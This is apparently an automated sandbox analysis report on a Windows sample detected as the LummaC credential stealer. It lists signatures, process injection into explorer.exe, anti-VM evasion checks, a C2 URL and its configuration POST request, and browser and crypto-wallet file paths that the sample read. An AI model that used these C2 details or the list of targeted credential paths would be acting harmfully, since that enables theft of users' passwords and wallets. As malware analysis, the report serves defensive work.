Edit tour

Windows Analysis Report
lJ2eYRm0Bd.exe

Overview

General Information

Sample Name:	lJ2eYRm0Bd.exe
Original Sample Name:	37bb336d579f839aa98af8218718eae84631c7cdf7ed4586728db333ea724987.exe
Analysis ID:	1303447
MD5:	47d732373d0f515ccb37b09f2f55d178
SHA1:	0365f9d183117fd29ab29574b74b67c570651918
SHA256:	37bb336d579f839aa98af8218718eae84631c7cdf7ed4586728db333ea724987
Tags:	exe
Infos:

Detection

LummaC Stealer

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Yara detected LummaC Stealer

Multi AV Scanner detection for submitted file

System process connects to network (likely due to code injection or exploit)

Antivirus detection for URL or domain

Antivirus detection for dropped file

Multi AV Scanner detection for dropped file

Snort IDS alert for network traffic

Maps a DLL or memory area into another process

Writes to foreign memory regions

Query firmware table information (likely to detect VMs)

Performs DNS queries to domains with low reputation

Found hidden mapped module (file has been removed from disk)

Injects code into the Windows Explorer (explorer.exe)

Machine Learning detection for dropped file

C2 URLs / IPs found in malware configuration

Found many strings related to Crypto-Wallets (likely being stolen)

Found evasive API chain (may stop execution after checking volume information)

Tries to harvest and steal browser information (history, passwords, etc)

Found evasive API chain (may stop execution after checking computer name)

Queries the volume information (name, serial number etc) of a device

Contains functionality to check if a debugger is running (IsDebuggerPresent)

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Found evasive API chain (date check)

PE file contains sections with non-standard names

Detected potential crypto function

Contains functionality to query CPU information (cpuid)

Found potential string decryption / allocating functions

Found evasive API chain (may stop execution after checking a module file name)

Yara detected Credential Stealer

JA3 SSL client fingerprint seen in connection with other malware

Contains functionality to call native functions

HTTP GET or POST without a user agent

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Searches for user specific document files

Is looking for software installed on the system

Drops files with a non-matching file extension (content does not match file extension)

Sample file is different than original file name gathered from version info

PE file contains an invalid checksum

Allocates memory with a write watch (potentially for evading sandboxes)

Drops PE files

Contains functionality to read the PEB

PE / OLE file has an invalid certificate

Found evasive API chain (may stop execution after accessing registry keys)

Contains functionality to query network adapater information

Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

System is w10x64

lJ2eYRm0Bd.exe (PID: 6968 cmdline: C:\Users\user\Desktop\lJ2eYRm0Bd.exe MD5: 47D732373D0F515CCB37B09F2F55D178)

cmd.exe (PID: 7020 cmdline: C:\Windows\SysWOW64\cmd.exe MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 7028 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

explorer.exe (PID: 5632 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 166AB1B9462E5C1D6D18EC5EC0B6A5F7)

cleanup

Malware Configuration

Threatname: LummaC

{"C2 url": "http://coolworkss.xyz/c2conf"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_LummaCStealer_1	Yara detected LummaC Stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author
Process Memory Space: cmd.exe PID: 7020	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security
Process Memory Space: explorer.exe PID: 5632	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security
Process Memory Space: explorer.exe PID: 5632	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security
Process Memory Space: explorer.exe PID: 5632	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security

Snort Signatures

ET TROJAN [ANY.RUN] Win32/Lumma Stealer Configuration Request Attempt - Source IP: 192.168.2.4 - Destination IP: 172.67.195.229

Timestamp:	192.168.2.4172.67.195.22949738802046637 09/05/23-13:02:23.880969
SID:	2046637
Source Port:	49738
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

HTTP traffic detected: POST /c2conf HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: coolworkss.xyzContent-Length: 36Cache-Control: no-cacheData Raw: 6c 69 64 3d 69 4f 71 70 49 71 2d 2d 50 65 74 74 65 72 26 6a 3d 64 65 66 61 75 6c 74 26 76 65 72 3d 34 2e 30 Data Ascii: lid=iOqpIq--Petter&j=default&ver=4.0

Source: unknown

DNS traffic detected: queries for: wwf.org

Source: C:\Windows\SysWOW64\explorer.exe

Code function: 19_2_008BC95C InternetCloseHandle,InternetOpenW,_strlen,HttpSendRequestA,HttpOpenRequestW,GetModuleHandleW,InternetReadFile,InternetQueryDataAvailable,InternetConnectA,InternetQueryDataAvailable,

19_2_008BC95C

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveHost: wwf.org
Source: global traffic	HTTP traffic detected: GET /?utm_campaign=301-redirects&utm_source=wwf.org&utm_medium=referral&utm_content=wwf.org HTTP/1.1Connection: Keep-AliveHost: www.worldwildlife.org
Source: global traffic	HTTP traffic detected: GET /2lsHcHC.png HTTP/1.1Connection: Keep-AliveHost: i.imgur.com
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveUser-Agent: TeslaBrowser/5.5Host: coolworkss.xyz

Source: unknown	HTTPS traffic detected: 104.18.6.142:443 -> 192.168.2.4:49717 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.18.6.94:443 -> 192.168.2.4:49718 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 199.232.32.193:443 -> 192.168.2.4:49719 version: TLS 1.2

Source: C:\Windows\SysWOW64\explorer.exe	Code function: 19_2_008AF8C0	19_2_008AF8C0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 19_2_008AD8F0	19_2_008AD8F0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 19_2_008BC95C	19_2_008BC95C
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 19_2_00892ABC	19_2_00892ABC
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 19_2_008A9A56	19_2_008A9A56
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 19_2_0089A30C	19_2_0089A30C
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 19_2_00893CBF	19_2_00893CBF
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 19_2_008B6C38	19_2_008B6C38
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 19_2_008B15E8	19_2_008B15E8
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 19_2_008B8E94	19_2_008B8E94
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 19_2_0089C7DB	19_2_0089C7DB
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 19_2_008A108C	19_2_008A108C
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 19_2_008948AC	19_2_008948AC
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 19_2_008CF0C0	19_2_008CF0C0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 19_2_008C78EF	19_2_008C78EF
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 19_2_008DD850	19_2_008DD850
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 19_2_008C51D4	19_2_008C51D4
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 19_2_008A415D	19_2_008A415D
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 19_2_008BF152	19_2_008BF152
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 19_2_008AA2C2	19_2_008AA2C2
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 19_2_008CFA1B	19_2_008CFA1B
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 19_2_008A6393	19_2_008A6393
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 19_2_008ACBED	19_2_008ACBED
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 19_2_008B6303	19_2_008B6303
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 19_2_0089DB70	19_2_0089DB70
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 19_2_00898492	19_2_00898492
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 19_2_008C84B3	19_2_008C84B3
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 19_2_008C1C70	19_2_008C1C70
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 19_2_008A2D83	19_2_008A2D83
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 19_2_008A4593	19_2_008A4593
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 19_2_008D55B4	19_2_008D55B4
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 19_2_008A05D8	19_2_008A05D8
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 19_2_008A75F9	19_2_008A75F9
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 19_2_008BED17	19_2_008BED17
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 19_2_008AED3B	19_2_008AED3B
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 19_2_008E2D3A	19_2_008E2D3A
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 19_2_008ABD53	19_2_008ABD53
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 19_2_008C5E94	19_2_008C5E94
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 19_2_008AAEF8	19_2_008AAEF8
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 19_2_008A274C	19_2_008A274C
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 19_2_008A3740	19_2_008A3740
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 19_2_0089FF6C	19_2_0089FF6C

Source: C:\Windows\SysWOW64\explorer.exe	Code function: String function: 008C1530 appears 45 times
Source: C:\Windows\SysWOW64\explorer.exe	Code function: String function: 008965E6 appears 38 times

Source: C:\Windows\SysWOW64\explorer.exe	Code function: 19_2_008998EC NtCreateFile,lstrlenW,lstrlenW,	19_2_008998EC
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 19_2_0089A30C lstrlenW,lstrcmpW,lstrcmpW,lstrcmpW,NtCreateFile,NtQueryDirectoryFile,lstrlenW,lstrlenW,lstrlenW,lstrcmpW,lstrcmpW,	19_2_0089A30C
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 19_2_00899F88 NtReadFile,	19_2_00899F88

Source: lJ2eYRm0Bd.exe	Binary or memory string: OriginalFilename vs lJ2eYRm0Bd.exe
Source: lJ2eYRm0Bd.exe, 00000000.00000002.283531068.0000000140627000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamenode.exe* vs lJ2eYRm0Bd.exe
Source: lJ2eYRm0Bd.exe, 00000000.00000002.282826399.0000000003628000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamezip.exe( vs lJ2eYRm0Bd.exe
Source: lJ2eYRm0Bd.exe, 00000000.00000002.282901842.0000000003B3D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs lJ2eYRm0Bd.exe

Source: lJ2eYRm0Bd.exe

Static PE information: invalid certificate

Source: lJ2eYRm0Bd.exe

ReversingLabs: Detection: 21%

Source: C:\Users\user\Desktop\lJ2eYRm0Bd.exe

File read: C:\Users\user\Desktop\lJ2eYRm0Bd.exe

Jump to behavior

Source: C:\Users\user\Desktop\lJ2eYRm0Bd.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\lJ2eYRm0Bd.exe C:\Users\user\Desktop\lJ2eYRm0Bd.exe
Source: C:\Users\user\Desktop\lJ2eYRm0Bd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Users\user\Desktop\lJ2eYRm0Bd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe	Jump to behavior

Source: C:\Users\user\Desktop\lJ2eYRm0Bd.exe

File created: C:\Users\user\AppData\Roaming\LVMKGWHFJ

Jump to behavior

Source: C:\Users\user\Desktop\lJ2eYRm0Bd.exe

File created: C:\Users\user\AppData\Local\Temp\c12f9ea1

Jump to behavior

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@6/3@40/5

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7028:120:WilError_01

Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\explorer.exe			Jump to behavior

Source: C:\Users\user\Desktop\lJ2eYRm0Bd.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\lJ2eYRm0Bd.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: lJ2eYRm0Bd.exe

Static PE information: More than 892 > 100 exports found

Source: lJ2eYRm0Bd.exe

Static PE information: Virtual size of .text is bigger than: 0x100000

Source: lJ2eYRm0Bd.exe

Static PE information: Image base 0x140000000 > 0x60000000

Source: lJ2eYRm0Bd.exe

Static file information: File size 6599040 > 1048576

Source: lJ2eYRm0Bd.exe	Static PE information: Raw size of .text is bigger than: 0x100000 < 0x3d6e00
Source: lJ2eYRm0Bd.exe	Static PE information: Raw size of .rdata is bigger than: 0x100000 < 0x1fb600

Source: lJ2eYRm0Bd.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source: lJ2eYRm0Bd.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: explorer.pdbUGP source: explorer.exe, 00000013.00000003.347708967.00000000054CA000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: ntdll.pdb source: lJ2eYRm0Bd.exe, 00000000.00000002.282901842.00000000039D4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: cmd.exe, 00000001.00000002.372995350.0000000005631000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000001.00000002.373078984.0000000005950000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000013.00000002.455324211.0000000004C10000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000013.00000002.455428620.0000000005040000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: ntdll.pdbUGP source: lJ2eYRm0Bd.exe, 00000000.00000002.282901842.00000000039D4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: cmd.exe, 00000001.00000002.372995350.0000000005631000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000001.00000002.373078984.0000000005950000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000013.00000002.455324211.0000000004C10000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000013.00000002.455428620.0000000005040000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: explorer.pdb source: explorer.exe, 00000013.00000003.347708967.00000000054CA000.00000004.00000001.00020000.00000000.sdmp

Source: C:\Windows\SysWOW64\explorer.exe	Code function: 19_2_008B56CF push eax; mov dword ptr [esp], D3455974h	19_2_008B56D0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 19_2_008D88DF push ecx; ret	19_2_008D88F2
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 19_2_008917F3 push eax; mov dword ptr [esp], 00000000h	19_2_008917F8

Source: lJ2eYRm0Bd.exe	Static PE information: section name: text
Source: kheeknpom.1.dr	Static PE information: section name: klnhh

Source: kheeknpom.1.dr	Static PE information: real checksum: 0x0 should be: 0x688c6
Source: lJ2eYRm0Bd.exe	Static PE information: real checksum: 0x6523bb should be: 0x653cd6

Source: initial sample

Static PE information: section name: .text entropy: 6.809602249269922

Source: C:\Windows\SysWOW64\cmd.exe

File created: C:\Users\user\AppData\Local\Temp\kheeknpom

Jump to dropped file

Source: C:\Windows\SysWOW64\cmd.exe

File created: C:\Users\user\AppData\Local\Temp\kheeknpom

Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Found hidden mapped module (file has been removed from disk)

Source: C:\Windows\SysWOW64\cmd.exe

Module Loaded: C:\USERS\user\APPDATA\LOCAL\PACKAGES\MICROSOFT.WINDOWS.CONTENTDELIVERYMANAGER_CW5N1H2TXYEWY\LOCALSTATE\CONTENTMANAGEMENTSDK\CREATIVES\310091\EVENTBEACONS.DAT

Source: C:\Users\user\Desktop\lJ2eYRm0Bd.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\lJ2eYRm0Bd.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Query firmware table information (likely to detect VMs)

Source: C:\Windows\SysWOW64\explorer.exe

System information queried: FirmwareTableInformation

Jump to behavior

Found evasive API chain (may stop execution after checking volume information)

Source: C:\Windows\SysWOW64\explorer.exe

Evasive API call chain: GetVolumeInformation,DecisionNodes,ExitProcess

graph_19-31162

Found evasive API chain (may stop execution after checking computer name)

Source: C:\Windows\SysWOW64\explorer.exe

Evasive API call chain: GetComputerName,DecisionNodes,ExitProcess

graph_19-30835

Source: C:\Users\user\Desktop\lJ2eYRm0Bd.exe TID: 6996	Thread sleep time: -30000s >= -30000s			Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe TID: 6260	Thread sleep time: -30000s >= -30000s			Jump to behavior

Source: C:\Windows\SysWOW64\explorer.exe

Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes

graph_19-30868

Source: C:\Windows\SysWOW64\explorer.exe

Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess

graph_19-30687

Source: C:\Windows\SysWOW64\explorer.exe

Registry key enumerated: More than 151 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall

Source: C:\Users\user\Desktop\lJ2eYRm0Bd.exe

Memory allocated: 38D0000 memory reserve | memory write watch

Jump to behavior

Source: C:\Windows\SysWOW64\explorer.exe	Evasive API call chain: RegOpenKey,DecisionNodes,ExitProcess			graph_19-30853
Source: C:\Windows\SysWOW64\explorer.exe	Evasive API call chain: RegQueryValue,DecisionNodes,ExitProcess			graph_19-30850

Source: C:\Windows\SysWOW64\explorer.exe

Code function: GetAdaptersInfo,GetAdaptersInfo,

19_2_008AD8F0

Source: C:\Users\user\Desktop\lJ2eYRm0Bd.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\SysWOW64\explorer.exe	Code function: 19_2_008D807F FindFirstFileExW,		19_2_008D807F
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 19_2_008D8133 FindFirstFileExW,FindNextFileW,FindClose,FindClose,		19_2_008D8133

Source: C:\Windows\SysWOW64\explorer.exe

API call chain: ExitProcess graph end node

graph_19-30693

Source: explorer.exe, 00000013.00000002.455393439.0000000004FBB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: noreply@vmware.com0
Source: explorer.exe, 00000013.00000002.455393439.0000000004FBB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: http://www.vmware.com/0
Source: explorer.exe, 00000013.00000002.455393439.0000000004FBB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware, Inc.1!0
Source: explorer.exe, 00000013.00000002.455393439.0000000004FBB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: http://www.vmware.com/0/
Source: lJ2eYRm0Bd.exe, 00000000.00000002.281956590.0000000000548000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000013.00000002.455198443.00000000032E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000013.00000002.455198443.00000000032A8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: explorer.exe, 00000013.00000002.455198443.00000000032E7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWF
Source: explorer.exe, 00000013.00000002.455393439.0000000004FBB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware, Inc.1
Source: explorer.exe, 00000013.00000002.455393439.0000000004FBB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware, Inc.0
Source: lJ2eYRm0Bd.exe, 00000000.00000002.282826399.0000000003530000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: mwww.@vmware"m0
Source: lJ2eYRm0Bd.exe, 00000000.00000000.211932349.00000001403D8000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: lgnW2/4/PEZB31jiVg88O8EckzXZOFKs7sjsLjBOlDW0JB9LeGna8gI4zJVSk/BwJVmcIGfE

Source: C:\Windows\SysWOW64\explorer.exe

Code function: 19_2_008C1355 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

19_2_008C1355

Source: C:\Windows\SysWOW64\explorer.exe

Code function: 19_2_008B8144 GetProcessHeap,RtlFreeHeap,

19_2_008B8144

Source: C:\Windows\SysWOW64\explorer.exe	Code function: 19_2_008C0073 mov eax, dword ptr fs:[00000030h]	19_2_008C0073
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 19_2_008CADBA mov ecx, dword ptr fs:[00000030h]	19_2_008CADBA
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 19_2_008D5E85 mov eax, dword ptr fs:[00000030h]	19_2_008D5E85

Source: C:\Windows\SysWOW64\explorer.exe	Code function: 19_2_008C1349 SetUnhandledExceptionFilter,	19_2_008C1349
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 19_2_008C1860 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	19_2_008C1860
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 19_2_008C1355 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	19_2_008C1355
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 19_2_008D46AB IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	19_2_008D46AB

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\SysWOW64\explorer.exe	Domain query: coolworkss.xyz
Source: C:\Windows\SysWOW64\explorer.exe	Network Connect: 104.21.60.111 80	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Network Connect: 172.67.195.229 80	Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\lJ2eYRm0Bd.exe	Section loaded: C:\Windows\SysWOW64\mshtml.dll target: C:\Windows\SysWOW64\cmd.exe protection: read write			Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: C:\Users\user\AppData\Local\Temp\kheeknpom target: C:\Windows\SysWOW64\explorer.exe protection: read write			Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\lJ2eYRm0Bd.exe	Memory written: C:\Windows\SysWOW64\cmd.exe base: 6B4E1000	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Memory written: C:\Windows\SysWOW64\explorer.exe base: 26F380	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Memory written: C:\Windows\SysWOW64\explorer.exe base: 890000	Jump to behavior

Injects code into the Windows Explorer (explorer.exe)

Source: C:\Windows\SysWOW64\cmd.exe	Memory written: PID: 5632 base: 26F380 value: 55			Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Memory written: PID: 5632 base: 890000 value: 00			Jump to behavior

Source: C:\Users\user\Desktop\lJ2eYRm0Bd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe			Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe			Jump to behavior

Source: explorer.exe, 00000013.00000003.347708967.00000000054CA000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000013.00000003.347708967.00000000054CA000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Microsoft-Reserved-24C26ACC-DE62-4303-88AD-6CD4F1447F18SecurityConfigureWindowsPasswordsProxy DesktopProgmanSoftware\Microsoft\Windows NT\CurrentVersion\WinlogonShellSoftware\Microsoft\Windows NT\CurrentVersion\Winlogon\AlternateShells\AvailableShells

Source: C:\Windows\SysWOW64\explorer.exe

Queries volume information: C:\ VolumeInformation

Jump to behavior

Source: C:\Windows\SysWOW64\explorer.exe

Code function: 19_2_008C1578 cpuid

19_2_008C1578

Source: C:\Users\user\Desktop\lJ2eYRm0Bd.exe

Code function: 0_2_00000001403AFE58 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,

0_2_00000001403AFE58

Source: C:\Windows\SysWOW64\explorer.exe

Code function: 19_2_008D9D44 GetTimeZoneInformation,

19_2_008D9D44

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: explorer.exe PID: 5632, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: cmd.exe PID: 7020, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Found many strings related to Crypto-Wallets (likely being stolen)

Source: explorer.exe, 00000013.00000003.359062273.0000000003384000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Electrum\wallets
Source: explorer.exe, 00000013.00000003.375236074.0000000005A1E000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: Chrome/Default/Extensions/Jaxx Liberty
Source: explorer.exe, 00000013.00000003.355913652.0000000003336000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: explorer.exe, 00000013.00000003.355913652.0000000003336000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: explorer.exe, 00000013.00000003.355913652.0000000003336000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: C:\Users\user\AppData\Roaming\Ethereum
Source: explorer.exe, 00000013.00000002.455198443.000000000331E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: keystore

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\CURRENT	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd	Jump to behavior
